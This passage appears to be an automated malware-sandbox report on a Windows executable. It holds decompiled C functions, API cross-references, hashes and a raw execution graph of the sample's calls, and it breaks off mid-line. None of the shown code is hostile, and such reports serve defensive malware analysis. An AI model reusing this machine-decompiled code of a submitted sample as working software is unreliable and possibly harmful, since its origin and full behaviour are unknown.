                                                    • Instruction Fuzzy Hash: C9F036301043C8A6EF155F51CC0DFA93B599B5634DF0C4119FD58955A2C778CA91AA70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00CD0FE4(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00CC6C31(E00CC6C36(_t6, 0xd01098, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xd01098, 0xd01098, 2);
				}
				return _t2;
			}






                                                    0x00cd0fe4
                                                    0x00cd0fea
                                                    0x00cd0ff3
                                                    0x00cd0ffc
                                                    0x00000000
                                                    0x00cd101b
                                                    0x00cd101c

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00CD1101,?,?,00CD117F,?,?,?,?,?,00CD1169), ref: 00CD0FEA
                                                    • GetLastError.KERNEL32(?,?,00CD117F,?,?,?,?,?,00CD1169), ref: 00CD0FF6
                                                      • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                    Strings
                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CD0FFF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                    • API String ID: 1091760877-2248577382
                                                    • Opcode ID: fd82b67be3cdf88037946b231c7a7ed26e77ed54634602aceb57bcfce9386712
                                                    • Instruction ID: a54e194efadc6537bb13b07daf504ea169e1568b874fa844cf7a1086cc1482b8
                                                    • Opcode Fuzzy Hash: fd82b67be3cdf88037946b231c7a7ed26e77ed54634602aceb57bcfce9386712
                                                    • Instruction Fuzzy Hash: 16D05B7150456477C6103324AD05FBF39049B12731B54472AF579552F5CE154AC19697
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCE29E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





                                                    0x00cce2a1
                                                    0x00cce2b1
                                                    0x00cce2b9
                                                    0x00cce2bb
                                                    0x00000000
                                                    0x00cce2bb
                                                    0x00cce2c0

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00CCDA55,?), ref: 00CCE2A3
                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CCDA55,?), ref: 00CCE2B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FindHandleModuleResource
                                                    • String ID: RTL
                                                    • API String ID: 3537982541-834975271
                                                    • Opcode ID: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                    • Instruction ID: 66bd738cbe5644ada963358f16c51e3f6c7f2713c914d702ae9c4e772cd5cf5c
                                                    • Opcode Fuzzy Hash: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                    • Instruction Fuzzy Hash: 34C0803124079076E73037757C0DF576E585B01B11F05045DF641E91D1DEE5C540C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:4.3%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:1.2%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:54
                                                    execution_graph 94471 363f76 94472 363f7e 94471->94472 94477 31ee60 messages 94471->94477 94637 32e29c 94472->94637 94474 31f1c1 PeekMessageW 94474->94477 94475 31eeb7 GetInputState 94475->94474 94475->94477 94476 31f085 94477->94474 94477->94475 94477->94476 94478 363271 TranslateAcceleratorW 94477->94478 94480 31f23f PeekMessageW 94477->94480 94481 31f0b4 timeGetTime 94477->94481 94482 31f223 TranslateMessage DispatchMessageW 94477->94482 94483 31f25f Sleep 94477->94483 94484 364127 Sleep 94477->94484 94486 36338d timeGetTime 94477->94486 94497 364004 94477->94497 94504 31f400 94477->94504 94511 31f680 94477->94511 94534 322ad0 94477->94534 94605 32f2a5 94477->94605 94610 32f27e timeGetTime 94477->94610 94612 384384 8 API calls 94477->94612 94613 3202f0 94477->94613 94636 383ef6 62 API calls __wsopen_s 94477->94636 94478->94477 94480->94477 94481->94477 94482->94480 94483->94477 94484->94497 94611 32a9e5 9 API calls 94486->94611 94490 3641be GetExitCodeProcess 94492 3641d4 WaitForSingleObject 94490->94492 94493 3641ea CloseHandle 94490->94493 94491 3a331e GetForegroundWindow 94491->94497 94492->94477 94492->94493 94493->94497 94495 363cf5 94495->94476 94496 36425c Sleep 94496->94477 94497->94477 94497->94490 94497->94491 94497->94495 94497->94496 94642 37f1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94497->94642 94643 32f27e timeGetTime 94497->94643 94644 37dc9c 46 API calls 94497->94644 94505 31f41f 94504->94505 94507 31f433 94504->94507 94645 31e910 94505->94645 94678 383ef6 62 API calls __wsopen_s 94507->94678 94508 31f42a 94508->94477 94510 364528 94510->94510 94513 31f6c0 94511->94513 94512 3202f0 216 API calls 94529 31f78c messages 94512->94529 94513->94529 94727 3305d2 5 API calls __Init_thread_wait 94513->94727 94516 36457d 94516->94529 94728 31bf07 94516->94728 94517 31bf07 8 API calls 94517->94529 94523 3645a1 94734 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94523->94734 94525 383ef6 62 API calls 94525->94529 94529->94512 94529->94517 94529->94525 94530 31fa91 94529->94530 94531 321c50 8 API calls 94529->94531 94718 31be6d 94529->94718 94722 31bdc1 94529->94722 94726 32b2d6 216 API calls 94529->94726 94735 3305d2 5 API calls __Init_thread_wait 94529->94735 94736 330433 29 API calls __onexit 94529->94736 94737 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94529->94737 94738 395131 105 API calls 94529->94738 94739 39721e 216 API calls 94529->94739 94530->94477 94531->94529 94535 322f70 94534->94535 94536 322b36 94534->94536 95124 3305d2 5 API calls __Init_thread_wait 94535->95124 94538 322b50 94536->94538 94539 367b7c 94536->94539 94773 3230e0 94538->94773 95134 3979f9 216 API calls 94539->95134 94541 322f7a 94544 322fbb 94541->94544 95125 31b25f 94541->95125 94543 367b88 94543->94477 94550 367b91 94544->94550 94551 322fec 94544->94551 94547 3230e0 9 API calls 94548 322b76 94547->94548 94548->94544 94549 322bac 94548->94549 94549->94550 94574 322bc8 __fread_nolock 94549->94574 95135 383ef6 62 API calls __wsopen_s 94550->95135 94553 31b3fe 8 API calls 94551->94553 94555 322ff9 94553->94555 94554 322f94 95131 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94554->95131 95132 32e662 216 API calls 94555->95132 94557 367bb9 95136 383ef6 62 API calls __wsopen_s 94557->95136 94560 322cef 94561 367c1c 94560->94561 94562 322cfc 94560->94562 95138 3960a2 57 API calls _wcslen 94561->95138 94564 3230e0 9 API calls 94562->94564 94566 322d09 94564->94566 94565 33016b 8 API calls 94565->94574 94569 367d45 94566->94569 94570 3230e0 9 API calls 94566->94570 94567 323032 95133 32fe59 8 API calls 94567->95133 94568 33019b 8 API calls 94568->94574 94579 367bb4 94569->94579 95139 383ef6 62 API calls __wsopen_s 94569->95139 94576 322d23 94570->94576 94573 3202f0 216 API calls 94573->94574 94574->94555 94574->94557 94574->94560 94574->94565 94574->94568 94574->94573 94575 367bfd 94574->94575 94574->94579 95137 383ef6 62 API calls __wsopen_s 94575->95137 94576->94569 94578 322d87 messages 94576->94578 94580 31be6d 8 API calls 94576->94580 94578->94567 94578->94569 94578->94579 94581 3230e0 9 API calls 94578->94581 94584 322e3b messages 94578->94584 94783 32f95e 94578->94783 94790 38de5d 94578->94790 94795 39a4b4 94578->94795 94801 384ad5 94578->94801 94806 317923 94578->94806 94811 385ed5 94578->94811 94841 386d2d 94578->94841 94854 388e39 94578->94854 94873 317953 94578->94873 94877 38874a 94578->94877 94902 32be75 94578->94902 94957 388d34 94578->94957 94960 3865b4 94578->94960 94965 399eea 94578->94965 94968 3895f6 94578->94968 94983 39cd16 94578->94983 95070 39a8ae 94578->95070 95078 39a5ac 94578->95078 95086 39eb63 94578->95086 95122 37e9c5 GetFileAttributesW 94578->95122 94579->94477 94580->94578 94581->94578 94582 322edd 94582->94477 94583 32e29c 8 API calls 94583->94584 94584->94582 94584->94583 94606 32f2b8 94605->94606 94607 32f2c1 94605->94607 94606->94477 94607->94606 94608 32f2e5 IsDialogMessageW 94607->94608 94609 36f83b GetClassLongW 94607->94609 94608->94606 94608->94607 94609->94607 94609->94608 94610->94477 94611->94477 94612->94477 94631 320326 messages 94613->94631 94614 330433 29 API calls pre_c_initialization 94614->94631 94615 3662cf 96055 383ef6 62 API calls __wsopen_s 94615->96055 94617 321645 94623 31be6d 8 API calls 94617->94623 94630 32044d messages 94617->94630 94618 33016b 8 API calls 94618->94631 94620 365c7f 94627 31be6d 8 API calls 94620->94627 94620->94630 94621 3661fe 96054 383ef6 62 API calls __wsopen_s 94621->96054 94622 31be6d 8 API calls 94622->94631 94623->94630 94627->94630 94628 3305d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94628->94631 94629 31bf07 8 API calls 94629->94631 94630->94477 94631->94614 94631->94615 94631->94617 94631->94618 94631->94620 94631->94621 94631->94622 94631->94628 94631->94629 94631->94630 94632 3660b9 94631->94632 94633 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 94631->94633 94635 320a5e messages 94631->94635 95984 321940 94631->95984 96042 321e00 94631->96042 96052 383ef6 62 API calls __wsopen_s 94632->96052 94633->94631 96053 383ef6 62 API calls __wsopen_s 94635->96053 94636->94477 94638 32e2a4 94637->94638 94639 32e2c8 94638->94639 94640 31c700 8 API calls 94638->94640 94639->94477 94641 32e2af messages 94640->94641 94641->94477 94642->94497 94643->94497 94644->94497 94646 31e92b 94645->94646 94647 3202f0 216 API calls 94646->94647 94664 31e94d 94647->94664 94648 363176 94710 383ef6 62 API calls __wsopen_s 94648->94710 94650 31e9bb messages 94650->94508 94651 31ed85 94651->94650 94662 33019b 8 API calls 94651->94662 94652 31ea73 94652->94651 94653 31ea7e 94652->94653 94687 33016b 94653->94687 94654 31ecaf 94656 363167 94654->94656 94657 31ecc4 94654->94657 94709 396062 8 API calls 94656->94709 94660 33016b 8 API calls 94657->94660 94658 31eb68 94696 33019b 94658->94696 94672 31eb1a 94660->94672 94661 33016b 8 API calls 94661->94664 94667 31ea85 __fread_nolock 94662->94667 94664->94648 94664->94650 94664->94651 94664->94652 94664->94658 94664->94661 94669 31ead9 __fread_nolock messages 94664->94669 94665 33016b 8 API calls 94666 31eaa6 94665->94666 94666->94669 94679 31d210 94666->94679 94667->94665 94667->94666 94669->94654 94670 363156 94669->94670 94669->94672 94674 363131 94669->94674 94676 36310f 94669->94676 94705 314485 216 API calls 94669->94705 94708 383ef6 62 API calls __wsopen_s 94670->94708 94672->94508 94707 383ef6 62 API calls __wsopen_s 94674->94707 94706 383ef6 62 API calls __wsopen_s 94676->94706 94678->94510 94680 31d276 94679->94680 94681 31d24a 94679->94681 94683 3202f0 216 API calls 94680->94683 94682 31f680 216 API calls 94681->94682 94685 31d250 94682->94685 94684 3617ee 94683->94684 94684->94685 94711 383ef6 62 API calls __wsopen_s 94684->94711 94685->94669 94688 330170 ___std_exception_copy 94687->94688 94689 33018a 94688->94689 94692 33018c 94688->94692 94712 33523d 7 API calls 2 library calls 94688->94712 94689->94667 94691 3309fd 94714 333634 RaiseException 94691->94714 94692->94691 94713 333634 RaiseException 94692->94713 94695 330a1a 94695->94667 94697 33016b ___std_exception_copy 94696->94697 94698 33018a 94697->94698 94701 33018c 94697->94701 94715 33523d 7 API calls 2 library calls 94697->94715 94698->94669 94700 3309fd 94717 333634 RaiseException 94700->94717 94701->94700 94716 333634 RaiseException 94701->94716 94704 330a1a 94704->94669 94705->94669 94706->94672 94707->94672 94708->94672 94709->94648 94710->94650 94711->94685 94712->94688 94713->94691 94714->94695 94715->94697 94716->94700 94717->94704 94719 31be90 __fread_nolock 94718->94719 94720 31be81 94718->94720 94719->94529 94720->94719 94721 33019b 8 API calls 94720->94721 94721->94719 94723 31bdcc 94722->94723 94724 31bdfb 94723->94724 94740 31bf39 94723->94740 94724->94529 94726->94529 94727->94516 94729 33019b 8 API calls 94728->94729 94730 31bf1c 94729->94730 94731 33016b 8 API calls 94730->94731 94732 31bf2a 94731->94732 94733 330433 29 API calls __onexit 94732->94733 94733->94523 94734->94529 94735->94529 94736->94529 94737->94529 94738->94529 94739->94529 94757 31cf30 94740->94757 94742 31bf49 94743 31bf57 94742->94743 94744 360d59 94742->94744 94746 33016b 8 API calls 94743->94746 94766 31b3fe 94744->94766 94748 31bf68 94746->94748 94747 360d64 94749 31bf07 8 API calls 94748->94749 94750 31bf72 94749->94750 94751 31bf81 94750->94751 94752 31be6d 8 API calls 94750->94752 94753 33016b 8 API calls 94751->94753 94752->94751 94754 31bf8b 94753->94754 94765 31be0f 39 API calls 94754->94765 94756 31bfaf 94756->94724 94758 31d177 94757->94758 94763 31cf43 94757->94763 94758->94742 94760 31bf07 8 API calls 94760->94763 94761 31cfed 94761->94742 94763->94760 94763->94761 94770 3305d2 5 API calls __Init_thread_wait 94763->94770 94771 330433 29 API calls __onexit 94763->94771 94772 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94763->94772 94765->94756 94767 31b40c 94766->94767 94769 31b412 94766->94769 94768 31be6d 8 API calls 94767->94768 94767->94769 94768->94769 94769->94747 94770->94763 94771->94763 94772->94763 94774 323121 94773->94774 94778 3230fd 94773->94778 95140 3305d2 5 API calls __Init_thread_wait 94774->95140 94776 32312b 94776->94778 95141 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94776->95141 94782 322b60 94778->94782 95142 3305d2 5 API calls __Init_thread_wait 94778->95142 94779 329ec7 94779->94782 95143 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94779->95143 94782->94547 95144 31c92d 94783->95144 94785 32f972 94786 36fac0 Sleep 94785->94786 94787 32f97a timeGetTime 94785->94787 94788 31c92d 39 API calls 94787->94788 94789 32f990 94788->94789 94789->94578 94791 31b3fe 8 API calls 94790->94791 94792 38de70 94791->94792 95150 38183b 94792->95150 94794 38de78 94794->94578 94799 39a4c7 94795->94799 94800 39a4d6 94799->94800 95175 318e70 94799->95175 94800->94578 94802 318e70 56 API calls 94801->94802 94803 384ae8 94802->94803 95252 37da81 94803->95252 94805 384af0 94805->94578 94807 317953 FindCloseChangeNotification 94806->94807 94808 31792b 94807->94808 94809 317953 FindCloseChangeNotification 94808->94809 94810 31793a messages 94809->94810 94810->94578 94812 385fbd 94811->94812 94813 385ef4 94811->94813 94815 318e70 56 API calls 94812->94815 94825 386011 94812->94825 94814 31c92d 39 API calls 94813->94814 94816 385eff 94814->94816 94818 385fef 94815->94818 94817 31c92d 39 API calls 94816->94817 94819 385f15 94817->94819 94820 318e70 56 API calls 94818->94820 94819->94812 94822 31bf07 8 API calls 94819->94822 94821 386001 94820->94821 95272 37d836 94821->95272 94824 385f26 94822->94824 94826 31bf07 8 API calls 94824->94826 94825->94578 94827 385f2f 94826->94827 94828 318e70 56 API calls 94827->94828 94829 385f3c 94828->94829 95314 31694e 94829->95314 94842 318e70 56 API calls 94841->94842 94843 386d47 94842->94843 94844 386d84 94843->94844 94845 31c92d 39 API calls 94843->94845 95481 37e783 94844->95481 94847 386d76 94845->94847 94847->94844 94849 31557e 9 API calls 94847->94849 94848 386d92 95486 317a59 94848->95486 94849->94844 94852 318e70 56 API calls 94852->94848 94853 386dd7 94853->94578 94855 31bf07 8 API calls 94854->94855 94856 388e4a 94855->94856 94857 33019b 8 API calls 94856->94857 94858 388e54 94857->94858 95492 3141a6 94858->95492 94861 318e70 56 API calls 94862 388e6d 94861->94862 94863 31557e 9 API calls 94862->94863 94864 388e78 94863->94864 94865 318e70 56 API calls 94864->94865 94866 388e85 94865->94866 94867 318e70 56 API calls 94866->94867 94868 388e97 94867->94868 94869 318e70 56 API calls 94868->94869 94870 388eac GetPrivateProfileStringW 94869->94870 95495 316ab6 94870->95495 94872 388ecf messages 94872->94578 94874 31795d 94873->94874 94875 31796c 94873->94875 94874->94578 94875->94874 94876 317971 FindCloseChangeNotification 94875->94876 94876->94874 94878 38875a __wsopen_s 94877->94878 94879 318e70 56 API calls 94878->94879 94880 38877b 94879->94880 94881 31c92d 39 API calls 94880->94881 94887 388799 94880->94887 94881->94887 94882 318e70 56 API calls 94883 38887c 94882->94883 94884 31557e 9 API calls 94883->94884 94885 3888a7 94884->94885 95509 33d913 94885->95509 94887->94882 94896 388973 94887->94896 94888 3888cd 94889 3888f7 GetCurrentDirectoryW SetCurrentDirectoryW 94888->94889 94890 388921 94889->94890 94889->94896 94891 37e387 4 API calls 94890->94891 94892 38892a 94891->94892 94893 37e9c5 GetFileAttributesW 94892->94893 94892->94896 94894 388938 94893->94894 94895 388940 GetFileAttributesW SetFileAttributesW 94894->94895 94901 3889cb 94894->94901 94897 388969 SetCurrentDirectoryW 94895->94897 94898 3889b1 94895->94898 94896->94578 94897->94896 94899 388a02 SetCurrentDirectoryW 94898->94899 94900 3889b5 SetCurrentDirectoryW 94898->94900 94899->94896 94900->94901 94901->94899 94903 316ab6 8 API calls 94902->94903 94904 32be8d 94903->94904 94905 33016b 8 API calls 94904->94905 94909 368f7a 94904->94909 94907 32bea6 94905->94907 94908 33019b 8 API calls 94907->94908 94910 32beb7 94908->94910 94954 32bf1f 94909->94954 95593 38a607 39 API calls 94909->95593 94911 317953 FindCloseChangeNotification 94910->94911 94912 32bec2 94911->94912 94914 31bf07 8 API calls 94912->94914 94913 31c92d 39 API calls 94915 368fdc 94913->94915 94916 32beca 94914->94916 94917 368fe4 94915->94917 94918 32bf2c 94915->94918 94919 317953 FindCloseChangeNotification 94916->94919 94921 31c92d 39 API calls 94917->94921 95564 32fdc9 94918->95564 94922 32bed1 94919->94922 94926 32bf33 94921->94926 94923 318e70 56 API calls 94922->94923 94924 32bedd 94923->94924 94925 317953 FindCloseChangeNotification 94924->94925 94927 32bee7 94925->94927 94928 32bf4e 94926->94928 94929 368ff9 94926->94929 95542 316e52 94927->95542 95569 317a14 94928->95569 94930 33019b 8 API calls 94929->94930 94934 368ffe 94930->94934 94939 369012 94934->94939 95594 3141c9 94934->95594 94936 32bf00 95549 316b12 94936->95549 94937 368f72 94943 317923 FindCloseChangeNotification 94937->94943 94947 369016 __fread_nolock 94939->94947 95597 381759 94939->95597 94940 32bf65 94945 317a59 8 API calls 94940->94945 94940->94947 94943->94909 94949 32bf79 94945->94949 94946 32bf0e 95588 316afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 94946->95588 94950 32bfb3 94949->94950 94951 317953 FindCloseChangeNotification 94949->94951 94950->94578 94953 32bfa7 94951->94953 94953->94950 94956 317923 FindCloseChangeNotification 94953->94956 94954->94913 94954->94918 94955 32bf15 94955->94954 95589 37d4bf 94955->95589 94956->94950 95669 38a240 94957->95669 94959 388d44 94959->94578 94961 318e70 56 API calls 94960->94961 94962 3865c7 94961->94962 94963 37e387 4 API calls 94962->94963 94964 3865d1 94963->94964 94964->94578 95750 3988b6 94965->95750 94967 399efa 94967->94578 94969 31bf07 8 API calls 94968->94969 94970 389607 94969->94970 94971 318e70 56 API calls 94970->94971 94972 389616 94971->94972 94973 31557e 9 API calls 94972->94973 94974 389621 94973->94974 94975 318e70 56 API calls 94974->94975 94976 38962e 94975->94976 94977 318e70 56 API calls 94976->94977 94978 389640 94977->94978 94979 318e70 56 API calls 94978->94979 94980 389655 WritePrivateProfileStringW 94979->94980 94981 38966b WritePrivateProfileStringW 94980->94981 94982 389677 94980->94982 94981->94982 94982->94578 94984 31bf07 8 API calls 94983->94984 94985 39cd39 94984->94985 94986 31bf07 8 API calls 94985->94986 94987 39cd42 94986->94987 94988 31bf07 8 API calls 94987->94988 94989 39cd4b 94988->94989 94990 318e70 56 API calls 94989->94990 94999 39cdda 94989->94999 94991 39cd71 94990->94991 95882 39d6b1 94991->95882 94993 39cda5 95908 39d2f7 94993->95908 94999->94578 95071 39a90a 95070->95071 95072 39a8ca 95070->95072 95073 39a928 95071->95073 95075 31c92d 39 API calls 95071->95075 95072->94578 95073->95072 95074 31c92d 39 API calls 95073->95074 95076 39a990 95073->95076 95074->95076 95075->95073 95932 380287 95076->95932 95080 39a607 95078->95080 95085 39a5c7 95078->95085 95079 39a625 95082 31c92d 39 API calls 95079->95082 95083 39a682 95079->95083 95079->95085 95080->95079 95081 31c92d 39 API calls 95080->95081 95081->95079 95082->95083 95084 380287 62 API calls 95083->95084 95084->95085 95085->94578 95087 31bf07 8 API calls 95086->95087 95088 39eb7a 95087->95088 95089 318e70 56 API calls 95088->95089 95090 39eb89 95089->95090 95091 317a14 8 API calls 95090->95091 95092 39eb9c 95091->95092 95093 318e70 56 API calls 95092->95093 95094 39eba9 95093->95094 95095 39ebc1 95094->95095 95096 39ec26 95094->95096 95098 31c92d 39 API calls 95095->95098 95097 318e70 56 API calls 95096->95097 95100 39ec2b 95097->95100 95099 39ebc6 95098->95099 95101 39ec38 95099->95101 95103 39ebdf 95099->95103 95100->95101 95102 39ec73 95100->95102 95105 316ab6 8 API calls 95101->95105 95104 39ec8b 95102->95104 95107 31c92d 39 API calls 95102->95107 95106 318685 8 API calls 95103->95106 95108 39eca4 95104->95108 95111 31c92d 39 API calls 95104->95111 95118 39ec45 95105->95118 95110 39ebec 95106->95110 95107->95104 95109 31be6d 8 API calls 95108->95109 95112 39ecbe 95109->95112 95113 317af4 8 API calls 95110->95113 95111->95108 95965 379b57 95112->95965 95115 39ebfa 95113->95115 95116 318685 8 API calls 95115->95116 95117 39ec13 95116->95117 95120 317af4 8 API calls 95117->95120 95118->94578 95119 39ec21 95121 317a59 8 API calls 95119->95121 95120->95119 95121->95118 95123 37e9d1 95122->95123 95123->94578 95124->94541 95126 31b26e _wcslen 95125->95126 95127 33019b 8 API calls 95126->95127 95128 31b296 __fread_nolock 95127->95128 95129 33016b 8 API calls 95128->95129 95130 31b2ac 95129->95130 95130->94554 95131->94544 95132->94567 95133->94567 95134->94543 95135->94579 95136->94579 95137->94579 95138->94576 95139->94579 95140->94776 95141->94778 95142->94779 95143->94782 95145 31c93e 95144->95145 95146 31c945 95144->95146 95145->95146 95149 336661 39 API calls _strftime 95145->95149 95146->94785 95148 31c988 95148->94785 95149->95148 95151 381852 95150->95151 95167 38196b 95150->95167 95152 38189f 95151->95152 95153 381872 95151->95153 95155 3818b6 95151->95155 95154 33019b 8 API calls 95152->95154 95153->95152 95157 381886 95153->95157 95161 381894 __fread_nolock 95154->95161 95158 33019b 8 API calls 95155->95158 95165 3818d3 95155->95165 95156 3818fa 95160 33019b 8 API calls 95156->95160 95159 33019b 8 API calls 95157->95159 95158->95165 95159->95161 95162 381900 95160->95162 95163 33016b 8 API calls 95161->95163 95169 32c1f1 95162->95169 95163->95167 95165->95156 95165->95157 95165->95161 95167->94794 95170 33019b 8 API calls 95169->95170 95171 32c208 95170->95171 95172 33016b 8 API calls 95171->95172 95173 32c214 95172->95173 95174 32f9e2 10 API calls 95173->95174 95174->95161 95176 318e85 95175->95176 95192 318e82 95175->95192 95177 318ebb 95176->95177 95178 318e8d 95176->95178 95180 318ecd 95177->95180 95185 356a29 95177->95185 95188 356b10 95177->95188 95204 335556 26 API calls 95178->95204 95205 32fe8f 54 API calls 95180->95205 95183 356b28 95183->95183 95184 318e9d 95187 33016b 8 API calls 95184->95187 95191 33019b 8 API calls 95185->95191 95197 356aa2 95185->95197 95189 318ea7 95187->95189 95207 335513 27 API calls 95188->95207 95190 31b25f 8 API calls 95189->95190 95190->95192 95194 356a72 95191->95194 95198 3817be 95192->95198 95193 33016b 8 API calls 95195 356a99 95193->95195 95194->95193 95196 31b25f 8 API calls 95195->95196 95196->95197 95206 32fe8f 54 API calls 95197->95206 95199 3817cb 95198->95199 95200 33016b 8 API calls 95199->95200 95201 3817d2 95200->95201 95208 37fbca 95201->95208 95203 38180c 95203->94800 95204->95184 95205->95184 95206->95188 95207->95183 95226 31c269 95208->95226 95210 37fbdd CharLowerBuffW 95214 37fbf0 95210->95214 95211 31627c 8 API calls 95211->95214 95212 37fc2e 95213 37fc40 95212->95213 95247 31627c 95212->95247 95216 33019b 8 API calls 95213->95216 95214->95211 95214->95212 95225 37fbfa ___scrt_fastfail 95214->95225 95220 37fc6e 95216->95220 95219 37fccd 95222 33016b 8 API calls 95219->95222 95219->95225 95221 37fc90 95220->95221 95250 37fb02 8 API calls 95220->95250 95232 37fd21 95221->95232 95223 37fce7 95222->95223 95224 33019b 8 API calls 95223->95224 95224->95225 95225->95203 95227 31c279 __fread_nolock 95226->95227 95228 31c27c 95226->95228 95227->95210 95229 33016b 8 API calls 95228->95229 95230 31c287 95229->95230 95231 33019b 8 API calls 95230->95231 95231->95227 95233 31bf07 8 API calls 95232->95233 95234 37fd53 95233->95234 95235 31bf07 8 API calls 95234->95235 95236 37fd5c 95235->95236 95237 31bf07 8 API calls 95236->95237 95246 37fd65 95237->95246 95238 3184b7 8 API calls 95238->95246 95239 380029 95239->95219 95240 336718 GetStringTypeW 95240->95246 95242 336661 39 API calls 95242->95246 95243 37fd21 40 API calls 95243->95246 95244 31acc0 8 API calls 95244->95246 95245 31be6d 8 API calls 95245->95246 95246->95238 95246->95239 95246->95240 95246->95242 95246->95243 95246->95244 95246->95245 95251 336742 GetStringTypeW _strftime 95246->95251 95248 31c269 8 API calls 95247->95248 95249 316287 95248->95249 95249->95213 95250->95220 95251->95246 95264 3179ed 95252->95264 95255 37daca GetLastError 95256 37dad7 CreateDirectoryW 95255->95256 95257 37dae5 95255->95257 95256->95257 95258 37dae3 95256->95258 95257->95258 95268 3196d9 95257->95268 95258->94805 95260 37db27 95261 37da81 8 API calls 95260->95261 95262 37db30 95261->95262 95262->95258 95263 37db34 CreateDirectoryW 95262->95263 95263->95258 95265 3179fb 95264->95265 95266 3196d9 8 API calls 95265->95266 95267 317a0f GetFileAttributesW 95266->95267 95267->95255 95267->95258 95269 3196f0 __fread_nolock 95268->95269 95270 3196e7 95268->95270 95269->95260 95270->95269 95271 31c269 8 API calls 95270->95271 95271->95269 95273 31bf07 8 API calls 95272->95273 95274 37d853 95273->95274 95275 31bf07 8 API calls 95274->95275 95276 37d85b 95275->95276 95277 31bf07 8 API calls 95276->95277 95278 37d863 95277->95278 95368 31557e 95278->95368 95281 31557e 9 API calls 95282 37d877 95281->95282 95378 37e958 95282->95378 95315 31bf07 8 API calls 95314->95315 95316 316964 95315->95316 95317 31bf07 8 API calls 95316->95317 95318 31696c 95317->95318 95319 31bf07 8 API calls 95318->95319 95320 316974 95319->95320 95321 31bf07 8 API calls 95320->95321 95322 31697c 95321->95322 95323 355725 95322->95323 95324 3169b0 95322->95324 95325 31be6d 8 API calls 95323->95325 95326 318685 8 API calls 95324->95326 95327 35572e 95325->95327 95328 3169be 95326->95328 95329 31bceb 8 API calls 95327->95329 95330 3196d9 8 API calls 95328->95330 95333 3169f3 95329->95333 95331 3169c8 95330->95331 95331->95333 95334 318685 8 API calls 95331->95334 95332 316a38 95443 318685 95332->95443 95333->95332 95335 316a14 95333->95335 95345 355750 95333->95345 95337 